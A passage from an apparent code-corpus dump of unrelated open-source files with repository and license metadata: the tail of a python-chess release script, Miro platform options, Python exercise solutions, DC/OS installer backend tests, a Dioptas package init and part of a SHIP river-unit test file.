system("git tag {0} -s -F {1}".format(tagname, release_filename))
system("git push origin master {0}".format(tagname))
return tagname
def update_rtd():
print("--- UPDATE RTD ---------------------------------------------------")
system("curl -X POST http://readthedocs.org/build/python-chess")
def pypi():
print("--- PYPI ---------------------------------------------------------")
system("python3 setup.py sdist upload")
def pythonhosted(tagname):
print("--- PYTHONHOSTED -------------------------------------------------")
print("Creating pythonhosted.zip ...")
with zipfile.ZipFile("pythonhosted.zip", "w") as zip_file:
zip_file.writestr("index.html", textwrap.dedent("""\
<html>
<head>
<meta http-equiv="refresh" content="0;url=http://python-chess.readthedocs.org/en/{0}/">
<script>
window.location.href = 'http://python-chess.readthedocs.org/en/{0}/';
</script>
</head>
</html>""".format(tagname)))
print("Getting credentials ...")
config = configparser.ConfigParser()
config.read(os.path.expanduser("~/.pypirc"))
username = config.get("pypi", "username")
password = config.get("pypi", "password")
auth = requests.auth.HTTPBasicAuth(username, password)
print("Username: {0}".format(username))
print("Getting CSRF token ...")
session = requests.Session()
res = session.get("https://pypi.python.org/pypi?:action=pkg_edit&name=python-chess", auth=auth)
if res.status_code != 200:
print(res.text)
print(res)
sys.exit(1)
soup = bs4.BeautifulSoup(res.text, "html.parser")
csrf = soup.find("input", {"name": "CSRFToken"})["value"]
print("CSRF: {0}".format(csrf))
print("Uploading ...")
with open("pythonhosted.zip", "rb") as zip_file:
res = session.post("https://pypi.python.org/pypi", auth=auth, data={
"CSRFToken": csrf,
":action": "doc_upload",
"name": "python-chess",
}, files={
"content": zip_file,
})
if res.status_code != 200 or not tagname in res.text:
print(res.text)
print(res)
sys.exit(1)
print("Done.")
def github_release(tagname):
print("--- GITHUB RELEASE -----------------------------------------------")
print("https://github.com/niklasf/python-chess/releases/tag/{0}".format(tagname))
if __name__ == "__main__":
check_git()
check_docs()
check_changelog()
test()
doctest()
benchmark()
tagname = tag_and_push()
update_rtd()
pypi()
pythonhosted(tagname)
github_release(tagname)
| gpl-3.0 | 6,621,367,582,515,650,000 | 30.461538 | 103 | 0.520608 | false |
debugger06/MiroX | linux/plat/options.py | 1 | 3688 | # Miro - an RSS based video player application
# Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011
# Participatory Culture Foundation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
#
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
"""miro.plat.options -- Holds platform-specific command line options.
Most/all of these are set in the miro.real script. The values here are
hopefully sane defaults.
"""
# these have no related prefs
shouldSyncX = False
frontend = 'html'
themeName = None
gconf_name = None
user_home = "~/"
override_dimensions = None
from miro.prefs import Pref
class LinuxPref(Pref):
def __init__(self, key, default, alias, helptext):
Pref.__init__(self, key, default, False, None, None)
self.alias = alias
self.helptext = helptext
FFMPEG_BINARY = LinuxPref(
key="ffmpegBinary",
default="/usr/bin/ffmpeg",
alias="ffmpeg",
helptext="Absolute path for ffmpeg binary.")
FFMPEG2THEORA_BINARY = LinuxPref(
key="ffmpeg2TheoraBinary",
default="/usr/bin/ffmpeg2theora",
alias="ffmpeg2theora",
helptext="Absolute path for ffmpeg2theora binary.")
FIRST_TIME = LinuxPref(
key="startupTasksDone",
default=True,
alias="firsttimestartup",
helptext="If False, Miro shows first time startup dialog.")
USE_RENDERER = LinuxPref(
key="useRenderer",
default=u"gstreamer",
alias="renderer",
helptext="Which renderer to use. (gstreamer, ...)")
GSTREAMER_IMAGESINK = LinuxPref(
key="DefaultGstreamerImagesink",
default="gconfvideosink",
alias="gstreamer-imagesink",
helptext=("Which GStreamer image sink to use for video. "
"(autovideosink, ximagesink, xvimagesink, gconfvideosink, ...)"))
GSTREAMER_AUDIOSINK = LinuxPref(
key="DefaultGstreamerAudiosink",
default="gconfaudiosink",
alias="gstreamer-audiosink",
helptext=("Which GStreamer sink to use for audio. "
"(autoaudiosink, osssink, alsasink, gconfaudiosink, ...)"))
SHOW_TRAYICON = Pref(
key="showTrayicon",
default=True,
platformSpecific=False)
WINDOWS_ICON = Pref(
key='windowsIcon',
default=None,
# this is platform specific, but if we set this to True then it
# won't look up the value in the theme's app.config file
platformSpecific=False)
# build a lookup for preferences by alias
PREFERENCES = {}
for mem in dir():
p = locals()[mem]
if isinstance(p, Pref) and hasattr(p, "alias"):
PREFERENCES[p.alias] = p
| gpl-2.0 | 1,548,895,991,307,455,500 | 33.46729 | 79 | 0.714208 | false |
mahmoudhossam/Google-Python-Exercises | basic/list1.py | 1 | 3144 | #!/usr/bin/python2 -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
# Basic list exercises
# Fill in the code for the functions below. main() is already set up
# to call the functions with a few different inputs,
# printing 'OK' when each function is correct.
# The starter code for each function includes a 'return'
# which is just a placeholder for your code.
# It's ok if you do not complete all the functions, and there
# are some additional functions to try in list2.py.
# A. match_ends
# Given a list of strings, return the count of the number of
# strings where the string length is 2 or more and the first
# and last chars of the string are the same.
# Note: python does not have a ++ operator, but += works.
def match_ends(words):
result = 0
for i in words:
if len(i) >= 2 and i[0] == i[len(i)-1]:
result += 1
return result
# B. front_x
# Given a list of strings, return a list with the strings
# in sorted order, except group all the strings that begin with 'x' first.
# e.g. ['mix', 'xyz', 'apple', 'xanadu', 'aardvark'] yields
# ['xanadu', 'xyz', 'aardvark', 'apple', 'mix']
# Hint: this can be done by making 2 lists and sorting each of them
# before combining them.
def front_x(words):
xs = []
non_x = []
for i in words:
if i.startswith('x'):
xs.append(i)
else:
non_x.append(i)
return sorted(xs) + sorted(non_x)
# C. sort_last
# Given a list of non-empty tuples, return a list sorted in increasing
# order by the last element in each tuple.
# e.g. [(1, 7), (1, 3), (3, 4, 5), (2, 2)] yields
# [(2, 2), (1, 3), (3, 4, 5), (1, 7)]
# Hint: use a custom key= function to extract the last element from each tuple.
def _get_key(tpl):
return tpl[len(tpl) - 1]
def sort_last(tuples):
return sorted(tuples, key=_get_key)
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print '%s got: %s expected: %s' % (prefix, repr(got), repr(expected))
# Calls the above functions with interesting inputs.
def main():
print 'match_ends'
test(match_ends(['aba', 'xyz', 'aa', 'x', 'bbb']), 3)
test(match_ends(['', 'x', 'xy', 'xyx', 'xx']), 2)
test(match_ends(['aaa', 'be', 'abc', 'hello']), 1)
print
print 'front_x'
test(front_x(['bbb', 'ccc', 'axx', 'xzz', 'xaa']),
['xaa', 'xzz', 'axx', 'bbb', 'ccc'])
test(front_x(['ccc', 'bbb', 'aaa', 'xcc', 'xaa']),
['xaa', 'xcc', 'aaa', 'bbb', 'ccc'])
test(front_x(['mix', 'xyz', 'apple', 'xanadu', 'aardvark']),
['xanadu', 'xyz', 'aardvark', 'apple', 'mix'])
print
print 'sort_last'
test(sort_last([(1, 3), (3, 2), (2, 1)]),
[(2, 1), (3, 2), (1, 3)])
test(sort_last([(2, 3), (1, 2), (3, 1)]),
[(3, 1), (1, 2), (2, 3)])
test(sort_last([(1, 7), (1, 3), (3, 4, 5), (2, 2)]),
[(2, 2), (1, 3), (3, 4, 5), (1, 7)])
if __name__ == '__main__':
main()
| apache-2.0 | 2,616,948,283,795,058,700 | 30.44 | 79 | 0.604326 | false |
lingmann/dcos | dcos_installer/test_backend.py | 1 | 12788 | import json
import os
import subprocess
import uuid
import passlib.hash
import pytest
import gen
import gen.build_deploy.aws
import release
from dcos_installer import backend
from dcos_installer.config import Config, make_default_config_if_needed, to_config
os.environ["BOOTSTRAP_ID"] = "12345"
@pytest.fixture(scope='module')
def config():
if not os.path.exists('dcos-release.config.yaml'):
pytest.skip("Skipping because there is no configuration in dcos-release.config.yaml")
return release.load_config('dcos-release.config.yaml')
@pytest.fixture(scope='module')
def config_testing(config):
if 'testing' not in config:
pytest.skip("Skipped because there is no `testing` configuration in dcos-release.config.yaml")
return config['testing']
@pytest.fixture(scope='module')
def config_aws(config_testing):
if 'aws' not in config_testing:
pytest.skip("Skipped because there is no `testing.aws` configuration in dcos-release.config.yaml")
return config_testing['aws']
def test_password_hash():
"""Tests that the password hashing method creates de-cryptable hash
"""
password = 'DcosTestingPassword!@#'
# only reads from STDOUT
hash_pw = subprocess.check_output(['dcos_installer', '--hash-password', password])
print(hash_pw)
hash_pw = hash_pw.decode('ascii').strip('\n')
assert passlib.hash.sha512_crypt.verify(password, hash_pw), 'Hash does not match password'
def test_set_superuser_password(tmpdir):
"""Test that --set-superuser-hash works"""
with tmpdir.as_cwd():
tmpdir.join('genconf').ensure(dir=True)
# TODO(cmaloney): Add tests for the behavior around a non-existent config.yaml
# Setting in a non-empty config.yaml which has no password set
make_default_config_if_needed('genconf/config.yaml')
assert 'superuser_password_hash' not in Config('genconf/config.yaml').config
# Set the password
create_fake_build_artifacts(tmpdir)
subprocess.check_call(['dcos_installer', '--set-superuser-password', 'foo'], cwd=str(tmpdir))
# Check that config.yaml has the password set
config = Config('genconf/config.yaml')
assert passlib.hash.sha512_crypt.verify('foo', config['superuser_password_hash'])
def test_generate_node_upgrade_script(tmpdir, monkeypatch):
upgrade_config = """
---
# The name of your DC/OS cluster. Visable in the DC/OS user interface.
cluster_name: 'DC/OS'
master_discovery: static
exhibitor_storage_backend: 'static'
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
process_timeout: 10000
bootstrap_url: file:///opt/dcos_install_tmp
master_list: ['10.0.0.1', '10.0.0.2', '10.0.0.5']
"""
monkeypatch.setenv('BOOTSTRAP_VARIANT', '')
create_config(upgrade_config, tmpdir)
create_fake_build_artifacts(tmpdir)
output = subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script', 'fake'], cwd=str(tmpdir))
assert output.decode('utf-8').splitlines()[-1].split("Node upgrade script URL: ", 1)[1]\
.endswith("dcos_node_upgrade.sh")
try:
subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script'], cwd=str(tmpdir))
except subprocess.CalledProcessError as e:
print(e.output)
assert e.output.decode('ascii') == "Must provide the version of the cluster upgrading from\n"
else:
raise Exception("Test passed, this should not pass without specifying a version number")
def test_version(monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'some-variant')
version_data = subprocess.check_output(['dcos_installer', '--version']).decode()
assert json.loads(version_data) == {
'version': '1.10.0-beta2',
'variant': 'some-variant'
}
def test_good_create_config_from_post(tmpdir):
"""
Test that it creates the config
"""
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
temp_ip_detect_path = workspace + '/ip-detect'
f = open(temp_ip_detect_path, "w")
f.write("#/bin/bash foo")
good_post_data = {
"agent_list": ["10.0.0.2"],
"master_list": ["10.0.0.1"],
"cluster_name": "Good Test",
"resolvers": ["4.4.4.4"],
"ip_detect_filename": temp_ip_detect_path
}
expected_good_messages = {}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=good_post_data,
config_path=temp_config_path)
assert messages == expected_good_messages
def test_bad_create_config_from_post(tmpdir):
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
bad_post_data = {
"agent_list": "foo",
"master_list": ["foo"],
}
expected_bad_messages = {
"agent_list": "Must be a JSON formatted list, but couldn't be parsed the given value `foo` as "
"one because of: Expecting value: line 1 column 1 (char 0)",
"master_list": 'Invalid IPv4 addresses in list: foo',
}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=bad_post_data,
config_path=temp_config_path)
assert messages == expected_bad_messages
def test_do_validate_config(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
# Create a temp config
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
temp_config_path = str(genconf_dir.join('config.yaml'))
# Initialize with defautls
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
expected_output = {
'ip_detect_contents': 'ip-detect script `genconf/ip-detect` must exist',
'ssh_user': 'Must set ssh_user, no way to calculate value.',
'master_list': 'Must set master_list, no way to calculate value.',
'ssh_key_path': 'could not find ssh private key: genconf/ssh_key'
}
with tmpdir.as_cwd():
assert Config(config_path='genconf/config.yaml').do_validate(include_ssh=True) == expected_output
def test_get_config(tmpdir):
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
expected_data = {
'cluster_name': 'DC/OS',
'master_discovery': 'static',
'exhibitor_storage_backend': 'static',
'resolvers': ['8.8.8.8', '8.8.4.4'],
'ssh_port': 22,
'process_timeout': 10000,
'bootstrap_url': 'file:///opt/dcos_install_tmp'
}
make_default_config_if_needed(temp_config_path)
config = Config(temp_config_path)
assert expected_data == config.config
def test_determine_config_type(tmpdir):
# Ensure the default created config is of simple type
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
got_output = backend.determine_config_type(config_path=temp_config_path)
expected_output = {
'message': '',
'type': 'minimal',
}
assert got_output == expected_output
def test_success():
mock_config = to_config({
'master_list': ['10.0.0.1', '10.0.0.2', '10.0.0.5'],
'agent_list': ['10.0.0.3', '10.0.0.4']
})
expected_output = {
"success": "http://10.0.0.1",
"master_count": 3,
"agent_count": 2
}
expected_output_bad = {
"success": "",
"master_count": 0,
"agent_count": 0
}
got_output, code = backend.success(mock_config)
mock_config.update({'master_list': '', 'agent_list': ''})
bad_out, bad_code = backend.success(mock_config)
assert got_output == expected_output
assert code == 200
assert bad_out == expected_output_bad
assert bad_code == 400
def test_accept_overrides_for_undefined_config_params(tmpdir):
temp_config_path = tmpdir.strpath + '/config.yaml'
param = ('fake_test_param_name', 'fake_test_param_value')
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=dict([param]),
config_path=temp_config_path)
assert not messages, "unexpected validation error: {}".format(messages)
assert Config(config_path=temp_config_path)[param[0]] == param[1]
simple_full_config = """---
cluster_name: DC/OS
master_discovery: static
exhibitor_storage_backend: static
master_list:
- 127.0.0.1
bootstrap_url: http://example.com
"""
def test_do_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(simple_full_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_configure(config_path='genconf/config.yaml') == 0
aws_base_config = """---
# NOTE: Taking advantage of what isn't talked about not being validated so we don't need valid AWS /
# s3 credentials in this configuration.
aws_template_storage_bucket: psychic
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_region_name: us-west-2
aws_template_upload: false
"""
def test_do_aws_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(aws_base_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_aws_cf_configure() == 0
valid_storage_config = """---
master_list:
- 127.0.0.1
aws_template_storage_access_key_id: {key_id}
aws_template_storage_bucket: {bucket}
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_secret_access_key: {access_key}
aws_template_upload: true
"""
def test_do_aws_cf_configure_valid_storage_config(config_aws, tmpdir, monkeypatch):
bucket = str(uuid.uuid4())
config_str = valid_storage_config.format(
key_id=config_aws["access_key_id"],
bucket=bucket,
access_key=config_aws["secret_access_key"])
assert aws_cf_configure(bucket, config_str, config_aws, tmpdir, monkeypatch) == 0
# TODO: add an assertion that the config that was resolved inside do_aws_cf_configure
# ended up with the correct region where the above testing bucket was created.
def test_override_aws_template_storage_region_name(config_aws, tmpdir, monkeypatch):
bucket = str(uuid.uuid4())
config_str = valid_storage_config.format(
key_id=config_aws["access_key_id"],
bucket=bucket,
access_key=config_aws["secret_access_key"])
config_str += '\naws_template_storage_region_name: {}'.format(config_aws['region_name'])
assert aws_cf_configure(bucket, config_str, config_aws, tmpdir, monkeypatch) == 0
def aws_cf_configure(s3_bucket_name, config, config_aws, tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
session = gen.build_deploy.aws.get_test_session(config_aws)
s3 = session.resource('s3')
s3_bucket = s3.Bucket(s3_bucket_name)
s3_bucket.create(CreateBucketConfiguration={'LocationConstraint': config_aws['region_name']})
create_config(config, tmpdir)
create_fake_build_artifacts(tmpdir)
try:
with tmpdir.as_cwd():
return backend.do_aws_cf_configure()
finally:
objects = [{'Key': o.key} for o in s3_bucket.objects.all()]
s3_bucket.delete_objects(Delete={'Objects': objects})
s3_bucket.delete()
def create_config(config_str, tmpdir):
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
config_path = genconf_dir.join('config.yaml')
config_path.write(config_str)
genconf_dir.join('ip-detect').write('#!/bin/bash\necho 127.0.0.1')
def create_fake_build_artifacts(tmpdir):
artifact_dir = tmpdir.join('artifacts/bootstrap')
artifact_dir.ensure(dir=True)
artifact_dir.join('12345.bootstrap.tar.xz').write('contents_of_bootstrap', ensure=True)
artifact_dir.join('12345.active.json').write('["package--version"]', ensure=True)
artifact_dir.join('test_variant.bootstrap.latest').write("12345")
tmpdir.join('artifacts/complete/test_variant.complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/complete/complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/packages/package/package--version.tar.xz').write('contents_of_package', ensure=True)
| apache-2.0 | -2,982,937,157,660,341,000 | 33.562162 | 115 | 0.665077 | false |
Dioptas/Dioptas | dioptas/model/__init__.py | 1 | 1265 | # -*- coding: utf-8 -*-
# Dioptas - GUI program for fast processing of 2D X-ray diffraction data
# Principal author: Clemens Prescher ([email protected])
# Copyright (C) 2014-2019 GSECARS, University of Chicago, USA
# Copyright (C) 2015-2018 Institute for Geology and Mineralogy, University of Cologne, Germany
# Copyright (C) 2019-2020 DESY, Hamburg, Germany
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from .CalibrationModel import CalibrationModel
from .ImgModel import ImgModel
from .MaskModel import MaskModel
from .PhaseModel import PhaseModel
from .PatternModel import PatternModel
from .OverlayModel import OverlayModel
from .BatchModel import BatchModel
| gpl-3.0 | 8,280,915,587,935,117,000 | 45.851852 | 94 | 0.781818 | false |
adrianbeloqui/Python | nested_lists.py | 1 | 1675 | """Given the names and grades for each student in a Physics class of N
students, store them in a nested list and print the name(s) of any
student(s) having the second lowest grade.
Note: If there are multiple students with the same grade, order their
names alphabetically and print each name on a new line.
Input Format
The first line contains an integer, N, the number of students.
The subsequent lines describe each student over 2N lines; the first
line contains a student's name, and the second line contains their
grade.
Constraints
2 <= N <= 5
There will always be one or more students having the second lowest
grade.
Output Format
Print the name(s) of any student(s) having the second lowest grade
in Physics; if there are multiple students, order their names
alphabetically and print each one on a new line.
"""
from operator import itemgetter
def second_lowest(*args):
arr = args[0]
lowest, higher_lowest = arr[0], ["", 100]
for student in arr:
if student[1] < higher_lowest[1]:
if student[1] < lowest[1]:
higher_lowest, lowest = lowest, student
elif student[1] == lowest[1]:
continue
else:
higher_lowest = student
return higher_lowest[1]
if __name__ == '__main__':
students = []
for _ in range(int(input())):
name = input()
score = float(input())
students.append([name, score])
second_largest_grade = second_lowest(students)
result_list = list(filter(lambda x: x[1] == second_largest_grade, students))
result_list.sort(key=itemgetter(0))
for student in result_list:
print(student[0]) | mit | -7,068,788,371,389,833,000 | 29.472727 | 80 | 0.666269 | false |
duncan-r/SHIP | tests/test_riverunit.py | 1 | 13279 | from __future__ import unicode_literals
import unittest
from ship.fmp.datunits import riverunit
from ship.fmp.datunits import ROW_DATA_TYPES as rdt
from ship.datastructures.rowdatacollection import RowDataCollection
from ship.datastructures import dataobject as do
from ship.fmp.fmpunitfactory import FmpUnitFactory
class RiverUnitTests(unittest.TestCase):
'''Tests for all of the methods in the river class.
The complications involved in writing these tests show that there is probably some
serious factoring needed in the RiverUnit class.
Perhaps breaking down the readData() method in to smaller chunks would be a good
start. Then looking at a similar approach to the setupUnit() method.
'''
def setUp(self):
'''Sets up everyting that is needed in multiple tests to save too
much mucking about.
'''
# Example list as read from the dat file on the readFile() method in FileTools.py
self.input_contents = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT\n',
'SECTION\n',
'1.069 Spill1 Spill2 Lat1\n',
' 15.078 1.111111 1000\n',
' 18\n',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 \n',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 \n',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 \n',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 \n',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 \n',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 \n',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 \n',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 \n',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 \n',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 \n',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 \n',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 \n',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 \n',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 \n',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 \n',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 \n',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 \n',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 \n']
# List as exported from the setupUnit() method
self.unit_data_test = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT',
'SECTION',
'1.069',
' 15.078 1.111111 1000',
' 18',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 ',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 ',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 ',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 ',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 ',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 ',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 ',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 ',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 ',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 ',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 ',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 ',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 ',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 ',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 ',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 ',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 ',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 ']
# Lists for each of the data objects that are created when reading the file
self.bankmarker = ['LEFT', '', '', '', '', 'BED', '', '', '', '', '', '', '', '', '', '', '', 'RIGHT']
self.chainage = [5.996, 6.936, 7.446, 7.635, 8.561, 9.551, 10.323, 10.904,
12.542, 13.74, 13.788, 13.944, 15.008, 16.355, 17.424, 18.449, 19.416, 19.420]
self.deactivation = ['LEFT', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'RIGHT']
self.easting = [291391.67, 291391.43, 291391.3, 291391.25, 291391.01, 291390.75, 291390.55, 291390.4,
291389.98, 291389.67, 291389.66, 291389.62, 291389.34, 291389.0, 291388.72, 291388.46, 291388.21, 291388.21]
self.elevation = [37.56, 37.197, 36.726, 35.235, 35.196, 35.19, 35.229, 35.319,
35.637, 35.593, 35.592, 36.148, 36.559, 37.542, 38.518, 39.037, 39.146, 39.133]
self.northing = [86582.61, 86581.7, 86581.21, 86581.03, 86580.13, 86579.18, 86578.43, 86577.87,
86576.29, 86575.13, 86575.09, 86574.93, 86573.91, 86572.6, 86571.57, 86570.58, 86569.65, 86569.65]
self.panelmarker = [False, True, False, False, False, False, False, False,
False, False, False, False, True, False, False, False, False, False]
self.roughness = [0.08, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.08, 0.08, 0.08, 0.08, 0.08, 0.08]
self.rpl = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
self.special = ['16', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '4095']
def test_readHeadData(self):
'''Checks that the readHeadData() method works individually from the
factory load in the test_river_object_vars_from_load() test.
This should help to narrow down the problem if tests fail.
'''
# create a unloaded river unit to just check the readHeadData() method.
r = riverunit.RiverUnit()
# Put the test data into the method
r._readHeadData(self.unit_data_test, 0)
self.assertEqual(r._name, '1.069')
self.assertEqual(r._name_ds, 'unknown')
self.assertEqual(r.head_data['comment'].value, '(Culvert Exit) CH:7932 - Trimmed to BT')
self.assertEqual(r.head_data['distance'].value, 15.078)
self.assertEqual(r.head_data['slope'].value, 1.111111)
self.assertEqual(r.head_data['density'].value, 1000)
def test_readRowData(self):
'''Checks that the readRowData() method works individually from the
factory load in the test_river_object_vars_from_load() test.
This should help to narrow down the problem if tests fail.
'''
# create a unloaded river unit to just check the readHeadData() method.
river = riverunit.RiverUnit()
# Put the test data into the readrowData() method
river.readUnitData(self.unit_data_test, 0)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.CHAINAGE), self.chainage)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.ELEVATION), self.elevation)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.ROUGHNESS), self.roughness)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.PANEL_MARKER), self.panelmarker)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.RPL), self.rpl)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.BANKMARKER), self.bankmarker)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.EASTING), self.easting)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.NORTHING), self.northing)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.DEACTIVATION), self.deactivation)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.SPECIAL), self.special)
self.assertEqual(river.unit_category, 'river')
self.assertEqual(river.unit_type, 'river')
def test_getData(self):
'''Test to check the suitability of the getData() method.
'''
# Create a factory and load the river unit
ifactory = FmpUnitFactory()
i, river = ifactory.createUnitFromFile(self.input_contents, 0, 'RIVER', 1, 1)
# Setup the list that we expect to be returned from the getData() method
out_data = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT',
'SECTION',
'1.069 Spill1 Spill2 Lat1',
' 15.078 1.1111 1000.00',
' 18',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 ',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 ',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 ',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 ',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 ',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 ',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 ',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 ',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 ',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 ',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 ',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 ',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 ',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 ',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 ',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 ',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 ',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 ']
# Get the data and check it against our template
data = river.getData()
self.assertEquals(out_data, data, 'getData() formatting failed')
def test_addDataRow(self):
"""Test adding a new row to 'main' data."""
# Create a factory and load the river unit
ifactory = FmpUnitFactory()
i, river = ifactory.createUnitFromFile(self.input_contents, 0, 'RIVER', 1, 1)
# Add with required only args
args = {rdt.CHAINAGE: 6.0, rdt.ELEVATION: 37.2}
river.addRow(args, index=1)
